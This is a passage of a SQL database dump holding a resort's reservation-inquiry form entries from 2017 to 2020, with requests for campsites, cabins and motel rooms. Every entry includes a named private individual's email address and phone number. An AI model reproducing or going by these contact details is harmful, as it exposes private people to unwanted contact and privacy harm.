15:09:09','text^name1^Robert~text^secondname1^Schwalboski~email^email1^smileyfacetwo@yahoo.com~text^phone1^320-290-9245~textarea^details1^Book me in motel Rm #3 for the 18th and 19th of Oct.  I left a message on the phone also.',1),(47,1,'',1,'','2017-10-18 00:00:00','2017-10-12 15:09:17','text^name1^Robert~text^secondname1^Schwalboski~email^email1^smileyfacetwo@yahoo.com~text^phone1^320-290-9245~textarea^details1^Book me in motel Rm #3 for the 18th and 19th of Oct.  I left a message on the phone also.',1),(48,1,'',1,'','2018-05-25 00:00:00','2017-12-08 10:18:00','text^name1^David~text^secondname1^Jostes~email^email1^djostes@msn.com~text^phone1^507-251-4814~textarea^details1^Hi! I would like to reserve a campsite with 30 amp or more electric for Memorial weekend.  I have a 34 foot travel trailer. I do not need water or sewer hookups.  Do you have a spot for me?',1),(49,1,'',1,'','2018-01-02 00:00:00','2017-12-30 09:25:31','text^name1^dale~text^secondname1^shores~email^email1^dhshores@gmail.com~text^phone1^6129988953~textarea^details1^',1),(50,1,'',1,'','2018-06-07 00:00:00','2018-01-19 10:20:42','text^name1^Bev~text^secondname1^Marsh~email^email1^bvmar@hotmail.com~text^phone1^7012802636~textarea^details1^Hi, we have a 36 ft RV and want to reserve an electric/water site.  Are any of these weekends available:   June 7-10, July 12-15, July 26-29, Aug 9-12, Aug 16-19.\n\nThank you\nBev Marsh\n701-280-2636',1),(51,1,'',1,'','2018-06-17 00:00:00','2018-02-15 00:45:39','text^name1^Sohail~text^secondname1^Bengali~email^email1^sohailbengali@gmail.com~text^phone1^4157301456~textarea^details1^Would like to book a villa/cabin for one night (June 17).  3 adults. On a bike trip across the west.  Ideally New Cabin 13, or 14.  Or Lakeside Villa 9.  Or Two sleepers.  Please call.  Thanks very much. Sohail',1),(52,1,'',1,'','2018-06-23 00:00:00','2018-02-17 08:21:25','text^name1^Terri~text^secondname1^Compton~email^email1^Terri56003@gmail.com~text^phone1^5074201264~textarea^details1^Week of 6/23/18 - 6/30/18\nOne 2 bedroom cabin and one RV spot with full hookup close together if possible ',1),(53,1,'',1,'','2018-04-14 00:00:00','2018-03-11 21:33:01','text^name1^Bryan~text^secondname1^Faust~email^email1^Bmfaust26@yahoo.com~text^phone1^612-396-9565~textarea^details1^Need a room for April 14th to accommodate 1-2 people',1),(54,1,'',1,'','2018-05-11 00:00:00','2018-03-13 12:29:27','text^name1^Annie~text^secondname1^Makepeace~email^email1^amdoberstein@gmail.com~text^phone1^~textarea^details1^Are you open for camping May 11-12? We would just need one tent-only site for one night. If so, what is the cost? Thank you,\nAnnie ',1),(55,1,'',1,'','2018-08-04 00:00:00','2018-03-15 00:50:33','text^name1^Jill~text^secondname1^Baldessari~email^email1^jillandos@hotmail.com~text^phone1^3038800058~textarea^details1^',1),(56,1,'',1,'','2018-07-07 00:00:00','2018-03-16 08:06:52','text^name1^Julie~text^secondname1^Wietzke~email^email1^jpriess@hotmail.com~text^phone1^~textarea^details1^Do you have availability on 7/7/18 for two 32 foot c class rvs?  \nThanks',1),(57,1,'',1,'','2018-09-15 00:00:00','2018-03-27 19:28:21','text^name1^Donna~text^secondname1^Laleman~email^email1^lalemd01@yahoo.com~text^phone1^5074763237~textarea^details1^would like to know if any of the cabins plus the pontoon are available for Sep 15th to the 22nd.Thank you',1),(58,1,'',1,'','2018-07-12 00:00:00','2018-03-27 20:58:45','text^name1^Elaine~text^secondname1^Deisz~email^email1^ejdeisz@q.com~text^phone1^3204240963~textarea^details1^Looking for tent site for Thursday July 12 thru Sunday July 15, so 3 nights, we have a fairly large tent and would like to be close to the bathroom, there will be 4 adults in our tent, looking at either P, Q, R, or S as those look closest to bathroom/shower. Please let me know what you have open for that weekend. Thanks!\nElaine\n320-424-0963',1),(59,1,'',1,'','2018-08-03 00:00:00','2018-05-12 11:44:55','text^name1^Bev~text^secondname1^Arndt~email^email1^bgarndt1@gmail.com~text^phone1^320-630-8928~textarea^details1^Do you have 1 or possibly 2 sites available August 3 to August 12?  Or any parts of that time. Thanks Bev Arndt ',1),(60,1,'',1,'','2018-08-02 00:00:00','2018-05-14 11:01:10','text^name1^Amy Atherton~text^secondname1^Atherton~email^email1^nteamy@hickorytech.net~text^phone1^5074611503~textarea^details1^Do you have anything open for August 2,3, 4 2018?',1),(61,1,'',1,'','2018-06-29 00:00:00','2018-05-14 16:18:46','text^name1^kathryn~text^secondname1^foley~email^email1^kathrynfoley401@gmail.com~text^phone1^6094057704~textarea^details1^need a cabin that sleeps 8 people. would need it June 29th- july3rd.',1),(62,1,'',1,'','2018-06-29 00:00:00','2018-05-14 16:18:49','text^name1^kathryn~text^secondname1^foley~email^email1^kathrynfoley401@gmail.com~text^phone1^6094057704~textarea^details1^need a cabin that sleeps 8 people. would need it June 29th- july3rd.',1),(63,1,'',1,'','2018-06-09 00:00:00','2018-05-14 23:33:47','text^name1^Sadie~text^secondname1^Becher~email^email1^sadiekraft62@hotmail.com~text^phone1^7018666041~textarea^details1^Do you have any availability for June 9th?\n',1),(64,1,'',1,'','2018-06-30 00:00:00','2018-05-21 16:46:34','text^name1^Kim~text^secondname1^Carlson~email^email1^kim.carlson@merrillcorp.com~text^phone1^320-293-6688~textarea^details1^A friend and I are planning a bike trip the last weekend in June (June 29-July 1).  Do you have any tenting or Sleepers open that weekend?',1),(65,1,'',1,'','2018-05-28 00:00:00','2018-05-22 15:22:46','text^name1^Brandi~text^secondname1^Blom~email^email1^Bjblom21@gmail.com~text^phone1^7014039797~textarea^details1^Just checking to see if you have any openings sunday the 27th.',1),(66,1,'',1,'','2018-06-04 00:00:00','2018-05-26 20:33:17','text^name1^Rick ~text^secondname1^Fey~email^email1^rafey@evertek.net~text^phone1^5158902042~textarea^details1^Kitchenette unit Monday -Friday, June 5 - 9?',1),(67,1,'',1,'','2018-08-31 00:00:00','2018-05-29 21:31:50','text^name1^Dave~text^secondname1^Roberts~email^email1^Dave_rob_00@yahoo.com~text^phone1^701-367-2319~textarea^details1^We are interested in your cabins and RV sites.\nWe have:\na family of 5 for a cabin 2 adults 3 children\na family of 6 for a cabin 4 adults 2 children\na family of 6 for an RV site 40ft fifth wheel. And 2 tents\nWe are looking at Labor Day Weekend. Arrive Friday Depart Monday.\n',1),(68,1,'',1,'','2018-08-17 00:00:00','2018-05-30 12:21:37','text^name1^Mary~text^secondname1^Moore~email^email1^Marymoore0530@gmail.com~text^phone1^2184432828~textarea^details1^Looking for an RV site ',1),(69,1,'',1,'','2018-06-15 00:00:00','2018-05-30 16:51:03','text^name1^Vicki~text^secondname1^Lee~email^email1^vlee@prairiehealth.org~text^phone1^218-205-6957~textarea^details1^I am looking for a camper site or tent site with or without elec.  Thanks',1),(70,1,'',1,'','2018-06-22 00:00:00','2018-06-03 20:25:21','text^name1^Wendy~text^secondname1^Weickert ~email^email1^wendyweickert@hotmail.com~text^phone1^7017995140~textarea^details1^Just wondering if you happen to have any vacancies June 22-24 and if you&amp;#39;d have #9 available? Thank you ',1),(71,1,'',1,'','2018-07-04 00:00:00','2018-06-13 23:38:25','text^name1^Timothy~text^secondname1^Leutboushou~email^email1^ideartha1986@gmail.com~text^phone1^6512073769~textarea^details1^We would like to have a campsite for 5-6 people ( 2 tents). We would stay Wednesday thru Sat Morning. Thank you!',1),(72,1,'',1,'','2018-07-28 00:00:00','2018-06-15 13:19:13','text^name1^Sharon~text^secondname1^Tupa~email^email1^Tupafarm@invisimax.com~text^phone1^218-791-3102~textarea^details1^Summer rates for 30 amp trailer.  Also, seasonal sites available and rates. ',1),(73,1,'',1,'','2018-07-13 00:00:00','2018-07-10 11:31:46','text^name1^Emalee~text^secondname1^Erickson~email^email1^emalee.erickson12@gmail.com~text^phone1^3208150908~textarea^details1^Are there hookup spots available for this coming weekend Friday July 13 - Sunday July 15th? ',1),(74,1,'',1,'','2018-07-20 00:00:00','2018-07-11 14:18:19','text^name1^Corey~text^secondname1^Culligan~email^email1^Corey.culligan@comcast.net~text^phone1^8604642390~textarea^details1^July 13-15',1),(75,1,'',1,'','2018-07-29 00:00:00','2018-07-17 16:53:23','text^name1^TAMMY ~text^secondname1^SHELDON~email^email1^TSHELDON01@GMAIL.COM~text^phone1^651-308-0567~textarea^details1^WE WOULD LIKE TO RESERVE AN RV SITE FOR 33FT SAT &amp; SUN NIGHTS 7/28 AND 7/29',1),(76,1,'',1,'','2018-09-07 00:00:00','2018-07-31 14:02:39','text^name1^Keith~text^secondname1^Rutherford~email^email1^krrcpa1981@gmail.com~text^phone1^7017413308~textarea^details1^Looking for an RV site for Sept 7 - 8',1),(77,1,'',1,'','2018-08-20 00:00:00','2018-08-01 00:05:26','text^name1^Toni~text^secondname1^Cam~email^email1^tonic9797@yahoo.com~text^phone1^3203610097~textarea^details1^I am looking for a campground that has everything and then some.  My family and I love to kayak and are always on the look out for a place to do it.  We have August 20 - 25th we are looking for a little get away.  I was told you guys have a great place!.  I have a pop-up camper.  I would like to be near the water, due to kayaks etc.  But not necessary.  I would also require WiFi as I am in graduate school and it is online and this is how I spend my evenings.  Please let me know if you can accommodate us.  There will be 1-5 of us at varying times due to our work schedules.',1),(78,1,'',1,'','2018-08-20 00:00:00','2018-08-01 00:05:37','text^name1^Toni~text^secondname1^Cam~email^email1^tonic9797@yahoo.com~text^phone1^3203610097~textarea^details1^I am looking for a campground that has everything and then some.  My family and I love to kayak and are always on the look out for a place to do it.  We have August 20 - 25th we are looking for a little get away.  I was told you guys have a great place!.  I have a pop-up camper.  I would like to be near the water, due to kayaks etc.  But not necessary.  I would also require WiFi as I am in graduate school and it is online and this is how I spend my evenings.  Please let me know if you can accommodate us.  There will be 1-5 of us at varying times due to our work schedules.',1),(79,1,'',1,'','2018-08-13 00:00:00','2018-08-02 20:36:27','text^name1^Kelle~text^secondname1^Molloy~email^email1^Kelle.jack@hotmail.com~text^phone1^5152029742~textarea^details1^Looking for a last minute vacation idea. Do you have any open cabins?',1),(80,1,'',1,'','2019-07-19 00:00:00','2018-08-17 14:04:07','text^name1^Debra~text^secondname1^Mcnamee~email^email1^dbayerlmcnamee@yahoo.com~text^phone1^2188508073~textarea^details1^I am looking for 5 camper sites, 2 tents, and 1 motel or cabin that is handicap accessible for July 19-21, 2019 for a family reunion.',1),(81,1,'',1,'','2019-07-19 00:00:00','2018-08-17 14:04:18','text^name1^Debra~text^secondname1^Mcnamee~email^email1^dbayerlmcnamee@yahoo.com~text^phone1^2188508073~textarea^details1^I am looking for 5 camper sites, 2 tents, and 1 motel or cabin that is handicap accessible for July 19-21, 2019 for a family reunion.',1),(82,1,'',1,'','2019-07-21 00:00:00','2018-09-23 20:08:43','text^name1^Dana~text^secondname1^Johnson~email^email1^dmakerson@gmail.com~text^phone1^9522016154~textarea^details1^Hello! I am looking for a location for a family reunion over the weekend of 7/19-21. We would need 6-7 motel rooms, 2 camper spots with full hookups and 2 tent camping spots. Could you give me a call back to let me know if this is something you could accomodate! Thanks so much! I look forward to hearing back. \n\nDana Johnson',1),(83,1,'',1,'','2018-10-12 00:00:00','2018-10-11 18:54:40','text^name1^Tricia~text^secondname1^Giese~email^email1^touks1@hotmail.com~text^phone1^651.353.8484~textarea^details1^Hi!\nWe&amp;#39;d like to rent two motel units for Friday evening (one with a kitchenette and one without).  I believe unit 6 &amp; 7 were available when I last spoke with Mike...those or something like it would be great. We&amp;#39;d then like just the kitchenette unit for Saturday night (if it&amp;#39;s still available of course).  4 people in the kitchenette (Giese) and 2 people in the regular unit for Friday night only.  Thank you!  ',1),(84,1,'',1,'','2018-11-29 00:00:00','2018-11-22 10:20:04','text^name1^Michael~text^secondname1^Johnson~email^email1^healthtransitions@gmail.com~text^phone1^19195933767~textarea^details1^Sleeper or less expensive, please/',1),(85,1,'',1,'','2019-01-19 00:00:00','2019-01-11 13:00:21','text^name1^Brenda~text^secondname1^Anderson~email^email1^brendamae67@yahoo.com~text^phone1^3202413974~textarea^details1^Wondering if you have any rooms available for Saturday, Jan 19?',1),(86,1,'',1,'','2019-05-31 00:00:00','2019-01-20 21:11:26','text^name1^Laken~text^secondname1^Beeler-Kerestes~email^email1^beelerl@msn.com~text^phone1^3207614990~textarea^details1^3 tent sites  Q R S for May 31st-June 2nd. We would also like to reserve the pontoon for Saturday the 1st. ',1),(87,1,'',1,'','2019-06-21 00:00:00','2019-01-21 09:50:04','text^name1^Lisa~text^secondname1^Neuenfeldt~email^email1^neufam@wi-net.com~text^phone1^7155706081~textarea^details1^We have a 30 ft. RV with one small slideout.  2 adults, 2 kids, no pets. Just looking for one night.',1),(88,1,'',1,'','2019-05-24 00:00:00','2019-01-28 17:59:41','text^name1^Bruce~text^secondname1^Iverson~email^email1^biversonid@gmail.com~text^phone1^6128897141~textarea^details1^25&amp;#39; RV, electric 20 Amp or 30 Amp\nBoat Lift, Ranger 19&amp;#39; fish &amp; ski',1),(89,1,'',1,'','2019-06-09 00:00:00','2019-01-31 15:24:40','text^name1^Sue~text^secondname1^Erdahl-Nelson~email^email1^erdahlbs@yahoo.com~text^phone1^3202463419~textarea^details1^We would be interested in June 9-20 in site C  or B also a camper spot for August 31- Sept 2. in sites B and C. We also need a cabin spot for August 31-Sept 2. If you can let us know as soon as possible we would appreciate it.  Thanks  Steve and Sue Nelson',1),(90,1,'',1,'','2019-07-06 00:00:00','2019-02-26 12:32:43','text^name1^Brandi~text^secondname1^Walters~email^email1^blmwalters@hotmail.com~text^phone1^7655853130~textarea^details1^I’m looking for a camp site for a pull behind travel trailer for July 6th through July 13th. Thank you ',1),(91,1,'',1,'','2019-05-23 00:00:00','2019-03-25 21:00:04','text^name1^Darlene~text^secondname1^Olson~email^email1^darolson58@yahoo.com~text^phone1^763-242-1153~textarea^details1^Am looking for a full hook up campsite May 23-27th\nThank you',1),(92,1,'',1,'','2019-05-17 00:00:00','2019-03-30 15:01:35','text^name1^Jessica~text^secondname1^Coffey~email^email1^jfcoffey11@icloud.com~text^phone1^7128997124~textarea^details1^Looking for a cabin from May 24-28\nThank you! ',1),(93,1,'',1,'','2019-05-24 00:00:00','2019-04-09 14:33:34','text^name1^Amie~text^secondname1^Maddox~email^email1^amuna@hotmail.com~text^phone1^218-766-7363~textarea^details1^I am interested in a 30 AMP RV site for the dates above.  We have a 21 foot Ice Castle that we will be camping in.  Electric only is needed.  Thank you!',1),(94,1,'',1,'','2019-04-20 00:00:00','2019-04-15 14:27:20','text^name1^Adam~text^secondname1^Olmstead~email^email1^adamholmstead@gmail.com~text^phone1^6515000924~textarea^details1^4 30 amp full hookup sites for july 20th, thank you',1),(95,1,'',1,'','2019-04-20 00:00:00','2019-04-15 14:27:31','text^name1^Adam~text^secondname1^Olmstead~email^email1^adamholmstead@gmail.com~text^phone1^6515000924~textarea^details1^4 30 amp full hookup sites for july 20th, thank you',1),(96,1,'',1,'','2019-05-10 00:00:00','2019-05-01 11:23:02','text^name1^John~text^secondname1^Forsman~email^email1^jjforsman@gmail.com~text^phone1^7638430891~textarea^details1^Looking for a camping (non-electric) site for the night of the 10th. ',1),(97,1,'',1,'','2019-06-21 00:00:00','2019-05-03 13:36:53','text^name1^Jennifer~text^secondname1^Santora~email^email1^jsantora75@gmail.com~text^phone1^~textarea^details1^25 ft RV - 3 adults, 2 dogs looking for 6/21-6/23 with full hook-ups if possible',1),(98,1,'',1,'','2019-06-13 00:00:00','2019-05-15 20:08:07','text^name1^Brian~text^secondname1^Lenderink~email^email1^brianlenderink@msn.com~text^phone1^~textarea^details1^Wondering what accommodations are available June 13-16',1),(99,1,'',1,'','2019-06-13 00:00:00','2019-05-15 20:08:15','text^name1^Brian~text^secondname1^Lenderink~email^email1^brianlenderink@msn.com~text^phone1^~textarea^details1^Wondering what accommodations are available June 13-16',1),(100,1,'',1,'','2019-05-24 00:00:00','2019-05-20 17:18:28','text^name1^Amanda~text^secondname1^Rathcke~email^email1^amanda_leeanne@hotmail.com~text^phone1^3203044059~textarea^details1^Just wondering if you have any avaliable sites for Friday night through Sunday night.',1),(101,1,'',1,'','2019-08-29 00:00:00','2019-05-21 10:13:59','text^name1^Danielle~text^secondname1^Ourada~email^email1^drourada@gmail.com~text^phone1^5078293506~textarea^details1^Hi wondering if you have a cabin available from august 29th to September 2nd?\nThanks',1),(102,1,'',1,'','2019-05-29 00:00:00','2019-05-22 19:11:31','text^name1^Karlee~text^secondname1^Homola~email^email1^k.a.homola2013@gmail.com~text^phone1^6055209138~textarea^details1^We would like to book an electrical site for arriving May 29 and leaving June 1. ',1),(103,1,'',1,'','2019-06-20 00:00:00','2019-05-26 12:42:12','text^name1^Allyssa~text^secondname1^Schwartz~email^email1^allykayschwartz@gmail.com~text^phone1^7013700912~textarea^details1^Looking for a cabin. 2 beds. ',1),(104,1,'',1,'','2019-06-20 00:00:00','2019-05-26 12:42:22','text^name1^Allyssa~text^secondname1^Schwartz~email^email1^allykayschwartz@gmail.com~text^phone1^7013700912~textarea^details1^Looking for a cabin. 2 beds. ',1),(105,1,'',1,'','2019-07-03 00:00:00','2019-05-30 10:36:00','text^name1^Brandi ~text^secondname1^Deutsch~email^email1^bdeutsch77@hotmail.com~text^phone1^7017990230~textarea^details1^Looking to book 1 or 2 cabins July 3, 4, 5, 6 and 7.  If you have one cabin that holds a total of 6 that would work or we could do two cabins.  I know it is probably to late of notice and everything is already booked, but i thought i would try.  Thank you! ',1),(106,1,'',1,'','2019-07-12 00:00:00','2019-05-30 15:11:08','text^name1^Katie ~text^secondname1^Pederson~email^email1^kathrynpederson@outlook.com~text^phone1^320-444-5065~textarea^details1^Hi I am wondering if there are any tent sites available for the weekend of July 12th-14th?',1),(107,1,'',1,'','2019-07-03 00:00:00','2019-06-10 19:02:59','text^name1^Lisa~text^secondname1^Hanson~email^email1^lisa.r.hanson@ampf.com~text^phone1^6126718661~textarea^details1^July 3-6\n5 adults and 2 dogs',1),(108,1,'',1,'','2019-07-04 00:00:00','2019-06-11 18:08:48','text^name1^Lauran~text^secondname1^Hegerle~email^email1^lhegerle@kmtel.com~text^phone1^507 250-7628~textarea^details1^do you have anything available July 4 &amp; 5, 2019?',1),(109,1,'',1,'','2019-06-15 00:00:00','2019-06-13 20:09:31','text^name1^Dean~text^secondname1^Beneke~email^email1^dean.beneke@sbcglobal.net~text^phone1^~textarea^details1^',1),(110,1,'',1,'','2019-06-22 00:00:00','2019-06-14 08:54:02','text^name1^Dean~text^secondname1^Beneke~email^email1^Dean.beneke@sbcglobal.net~text^phone1^9032745288~textarea^details1^',1),(111,0,'',1,'','2019-07-05 00:00:00','2019-06-14 19:20:03','text^name1^Jill~text^secondname1^Eckhoff~email^email1^jek7788@gmail.com~text^phone1^612.840.9595~textarea^details1^We&amp;#39;d really like a kitchenette or cabin 9 on the lake for two nights, or I&amp;#39;d be interested in Mon 7/1-Sun 7/7 rate also - thanks!',1),(112,1,'',1,'','2019-06-28 00:00:00','2019-06-16 14:01:25','text^name1^Jean~text^secondname1^Rethemeier~email^email1^j.rethemeier@yahoo.com~text^phone1^952.210.9985~textarea^details1^Looking for June 28th and 29th camping in a small pop up camper.  \nAlso are four legged children welcome?',1),(113,1,'',1,'','2019-06-28 00:00:00','2019-06-16 14:01:35','text^name1^Jean~text^secondname1^Rethemeier~email^email1^j.rethemeier@yahoo.com~text^phone1^952.210.9985~textarea^details1^Looking for June 28th and 29th camping in a small pop up camper.  \nAlso are four legged children welcome?',1),(114,1,'',1,'','2019-07-26 00:00:00','2019-06-23 21:52:26','text^name1^Amanda~text^secondname1^Day~email^email1^aday503@hotmail.com~text^phone1^320-905-1709~textarea^details1^Looking to reserve a tent site for July 26th and 27th for 2 adults and 2 kids. A site with room for 2 tents. ',1),(115,1,'',1,'','2019-07-26 00:00:00','2019-06-23 21:52:36','text^name1^Amanda~text^secondname1^Day~email^email1^aday503@hotmail.com~text^phone1^320-905-1709~textarea^details1^Looking to reserve a tent site for July 26th and 27th for 2 adults and 2 kids. A site with room for 2 tents. ',1),(116,0,'',1,'','2019-08-03 00:00:00','2019-06-26 10:58:07','text^name1^Leah~text^secondname1^Berkner~email^email1^Leahberkner@yahoo.com~text^phone1^5078410660~textarea^details1^Checking to see if you have sites available for campers August 3-8. If so which sites are available? Are pets allowed?',1),(117,0,'',1,'','2019-08-03 00:00:00','2019-06-26 10:58:16','text^name1^Leah~text^secondname1^Berkner~email^email1^Leahberkner@yahoo.com~text^phone1^5078410660~textarea^details1^Checking to see if you have sites available for campers August 3-8. If so which sites are available? Are pets allowed?',1),(118,0,'',1,'','2019-08-15 00:00:00','2019-06-27 16:09:13','text^name1^Jessica~text^secondname1^Moore~email^email1^jessica.moore4472@gmail.com~text^phone1^651-274-4472~textarea^details1^Hello, we have a group of about 7-9 tents/campers looking for a group site of some sort for August 15-19 for a family group camping trip. Do you have anything like this available? This is a very mellow family group, we go somewhere different every year to explore the state. unfortunately, it turns out the resort we DID have reserved, the lake isn’t even swimmable. That is a BIG downfall with the group we have.\nThank you,\nJessica Moore\n',1),(119,0,'',1,'','2019-07-27 00:00:00','2019-06-27 19:52:40','text^name1^Tim~text^secondname1^Johnston ~email^email1^Tjohnston10@charter.net~text^phone1^6513989104~textarea^details1^July 27/August 3?',1),(120,0,'',1,'','2019-07-27 00:00:00','2019-06-27 19:52:49','text^name1^Tim~text^secondname1^Johnston ~email^email1^Tjohnston10@charter.net~text^phone1^6513989104~textarea^details1^July 27/August 3?',1),(121,0,'',1,'','2019-07-27 00:00:00','2019-06-27 19:52:59','text^name1^Tim~text^secondname1^Johnston ~email^email1^Tjohnston10@charter.net~text^phone1^6513989104~textarea^details1^July 27/August 3?',1),(122,0,'',1,'','2019-06-29 00:00:00','2019-06-28 20:33:12','text^name1^Jeffrey~text^secondname1^VanDam~email^email1^addictedgordon_fan@yahoo.com~text^phone1^6059406640~textarea^details1^What&amp;#39;s the rate for the villa??',1),(123,0,'',1,'','2019-07-18 00:00:00','2019-07-02 02:50:44','text^name1^Miranda~text^secondname1^Brudelie~email^email1^mirandabrudelie@gmail.com~text^phone1^6053601529~textarea^details1^Hello, I am interested in reserving 2 adjacent tent sites with electricity for 1 party July18th through the 21st and the other party is for July 19th through the 21st. Please let me know what you may have available. thank you',1),(124,0,'',1,'','2019-07-22 00:00:00','2019-07-05 08:46:53','text^name1^Jess~text^secondname1^Tripp~email^email1^purple_ford@hotmail.com~text^phone1^~textarea^details1^Hello, I am wondering if you have any overnight camping spots available with full hookups for the for a 3 night stay between the 22nd and the 25th of july?  Thank you.',1),(125,0,'',1,'','2019-08-17 00:00:00','2019-07-06 20:54:43','text^name1^Robin~text^secondname1^Liekhus~email^email1^rlh200974@yahoo.com~text^phone1^6122697645~textarea^details1^We are looking to rent the cabins for three families. ',1),(126,0,'',1,'','2019-07-12 00:00:00','2019-07-07 19:17:31','text^name1^Maggie~text^secondname1^Calhoun~email^email1^maggiemelancon@icloud.com~text^phone1^6125982442~textarea^details1^looking for Friday to Sunday or Saturday to Monday, we have a 27&amp;#39; RV and would like hook up service',1),(127,0,'',1,'','2019-07-16 00:00:00','2019-07-14 10:51:47','text^name1^Robert~text^secondname1^Bott~email^email1^bottr@nucleus.com~text^phone1^403-510-0018~textarea^details1^Bicycle tourer looking for tent site, one persn, one night Tuesday, July 16.',1),(128,0,'',1,'','2019-08-09 00:00:00','2019-07-16 08:05:42','text^name1^brenda~text^secondname1^moretz~email^email1^brendamoretz@gmail.com~text^phone1^6413901839~textarea^details1^do you have cabin 13 or 14 open from August 8 through 11th',1),(129,0,'',1,'','2019-08-30 00:00:00','2019-07-25 19:32:09','text^name1^William~text^secondname1^Hershkowitz~email^email1^Bhershkowitz9@gmail.com~text^phone1^6126164927~textarea^details1^Three guys looking to camp and fish with our own 14 foot boat.',1),(130,0,'',1,'','2019-08-16 00:00:00','2019-07-26 19:51:59','text^name1^Lisa~text^secondname1^Lorenzen ~email^email1^Lisalorenzen@ymail.com~text^phone1^612-242-4462~textarea^details1^Hello, I&amp;#39;m curious if you have any openings the weekend of August 16th-19th and if so, which type, and what is the cost per night?    I didnt understand how to read your website calendars as far as what is available for each of the types of dwellings.  It would just be for 3 people  (2 beds.)   Thank you.   ',1),(131,0,'',1,'','2020-07-25 00:00:00','2019-08-06 07:48:39','text^name1^Kara~text^secondname1^Pahl~email^email1^kpahl2007@gmail.com~text^phone1^5073170240~textarea^details1^We are looking for a cabin for 4 adults and 3 kids and 2 campsites for July 25 thru August 1, 2020. Do you have any availability?',1),(132,0,'',1,'','2020-08-05 00:00:00','2019-08-09 17:07:32','text^name1^Beth~text^secondname1^Heller~email^email1^symbabe@hotmail.com~text^phone1^7013884536~textarea^details1^We would like cabin #10 for Aug 5-11 and cabin #11 for Aug 5-9.',1),(133,0,'',1,'','2020-08-05 00:00:00','2019-08-09 17:07:43','text^name1^Beth~text^secondname1^Heller~email^email1^symbabe@hotmail.com~text^phone1^7013884536~textarea^details1^We would like cabin #10 for Aug 5-11 and cabin #11 for Aug 5-9.',1),(134,0,'',1,'','2019-08-24 00:00:00','2019-08-12 19:22:39','text^name1^Al ~text^secondname1^Pillman~email^email1^alanpillman41@aol.com~text^phone1^406  443 8742~textarea^details1^Have reservation from 8/23/19 through 8/30/19 for a cabin for 2 people, plus boat &amp; motor for the week.  Put down a down payment when I booked the time.  I don’t see the reservation on the calendar.  Please call to confirm, plus discuss amount I put down &amp; amount still owing.  406 443 8742. Arriving Fri. 8/23/19.  Thanks',1),(135,0,'',1,'','2019-09-09 00:00:00','2019-08-19 13:23:32','text^name1^David~text^secondname1^Hebeisen~email^email1^camoguy@centurylink.net~text^phone1^8704675458~textarea^details1^3 or 4 nights 3 old farts',1),(136,0,'',1,'','2019-09-09 00:00:00','2019-08-19 13:23:43','text^name1^David~text^secondname1^Hebeisen~email^email1^camoguy@centurylink.net~text^phone1^8704675458~textarea^details1^3 or 4 nights 3 old farts',1),(137,0,'',1,'','2019-09-06 00:00:00','2019-08-25 12:12:23','text^name1^Amy ~text^secondname1^Bacigalupo~email^email1^asbacig@gmail.com~text^phone1^3202691256~textarea^details1^We are interested in #3 or #7 for two adults but we would be willing to take one of the smaller motel rooms without a kitchenette.  ',1),(138,0,'',1,'','2019-09-20 00:00:00','2019-08-26 11:02:55','text^name1^deb~text^secondname1^gaukler~email^email1^dg4837@hotmail.com~text^phone1^7015384193~textarea^details1^Hi - i am checking if you have a seasonal campsite available for 2020.\nthank you - \ndeb',1),(139,0,'',1,'','2019-10-11 00:00:00','2019-10-08 13:36:26','text^name1^Shawn~text^secondname1^Sloan ~email^email1^Shawnsloan42@gmail.com~text^phone1^6513982352~textarea^details1^What are the prices of the kitchenette sleeper for Friday and Saturday ',1),(140,0,'',1,'','2020-07-03 00:00:00','2019-12-13 15:03:28','text^name1^erik~text^secondname1^hegerle~email^email1^erik.hegerle@yahoo.com~text^phone1^7014717815~textarea^details1^looking for something for fri-sunday over the 4th of july  \nthanks',1),(141,0,'',1,'','2020-01-11 00:00:00','2020-01-01 18:17:05','text^name1^Becca~text^secondname1^Anderson~email^email1^erickreb09@yahoo.com~text^phone1^~textarea^details1^',1),(142,0,'',1,'','2020-05-08 00:00:00','2020-01-15 00:48:02','text^name1^Scott ~text^secondname1^Running ~email^email1^scrunn@comcast.net~text^phone1^6512146677~textarea^details1^Hi,\n\nI am wondering if cabin #11 is available for the weekend of May 8-9. \n\nThanks \nScott Running ',1),(143,0,'',1,'','2020-07-17 00:00:00','2020-01-23 10:27:24','text^name1^Michelle~text^secondname1^Zajac~email^email1^michelleezajac@yahoo.com~text^phone1^7013880219~textarea^details1^We are looking for a nice campground to host our family reunion this summer. We typically have about 10 campers and would like full hookups with either sewer or a dump station. We would like the weekend of July 17-19. Would you be able to accommodate us? Do you have  10 RV spots together? A shelter/picnic area for our Saturday noon meal? What are your rates? Please email me at michelleezajac@yahoo.com. Thank you so much!!\nMichelle',1),(144,0,'',1,'','2020-07-02 00:00:00','2020-01-24 08:13:15','text^name1^karen~text^secondname1^stark~email^email1^karenannstark@hotmail.com~text^phone1^612-747-4037~textarea^details1^looking for sites for 7/2-7/6',1),(145,0,'',1,'','2020-06-20 00:00:00','2020-01-24 19:56:27','text^name1^Wendy~text^secondname1^McEttrick~email^email1^wendyadamc@yahoo.com~text^phone1^6032496177~textarea^details1^One night - pet friendly\n12 foot camper\nSmall camper/tent site -No needs',1),(146,0,'',1,'','2020-07-09 00:00:00','2020-02-08 09:56:36','text^name1^Amy~text^secondname1^Grazziani~email^email1^amygrazziani@gmail.com~text^phone1^6617559232~textarea^details1^Hi there, my family will be visiting from CA for a memorial service and family reunion July 2-6. Do you have anything available for a family of 4 for those dates? Thank you for your help! \nAmy Grazziani ',1),(147,0,'',1,'','2020-05-28 00:00:00','2020-02-21 13:34:51','text^name1^Todd~text^secondname1^Morrissey~email^email1^tmorriss_23@yahoo.com~text^phone1^507-210-2482~textarea^details1^Looking to rent a cabin May 28th - May 31st.  Do you have anything available?  Would you rent us 3 nights or do you strictly do fill weeks.  Most likely be 3 or 4 of us.  Any information would be appreciated.',1),(149,0,'',1,'','2020-07-10 00:00:00','2020-05-11 13:12:00','text^name1^Alec~text^secondname1^Running~email^email1^alec1429@gmail.com~text^phone1^6126956758~textarea^details1^I&amp;#39;m looking for a campsite for one or two tents. I&amp;#39;m interested in staying Monday night also, in the event a site opens up.',1),(150,0,'',1,'','2020-08-14 00:00:00','2020-05-12 16:51:16','text^name1^Jasohntre~text^secondname1^Byrd~email^email1^jasohntre@yahoo.com~text^phone1^612-597-1177~textarea^details1^I wanted to book two nights at these dates for the newer cabins either #13 or #14. July 23 &amp; 24',1),(151,0,'',1,'','2020-05-22 00:00:00','2020-05-18 14:36:33','text^name1^Lee~text^secondname1^Stewart~email^email1^leelee-stew@hotmail.com~text^phone1^7634426122~textarea^details1^Looking to book a cabin for 2 adults. Check in 5-22, check out 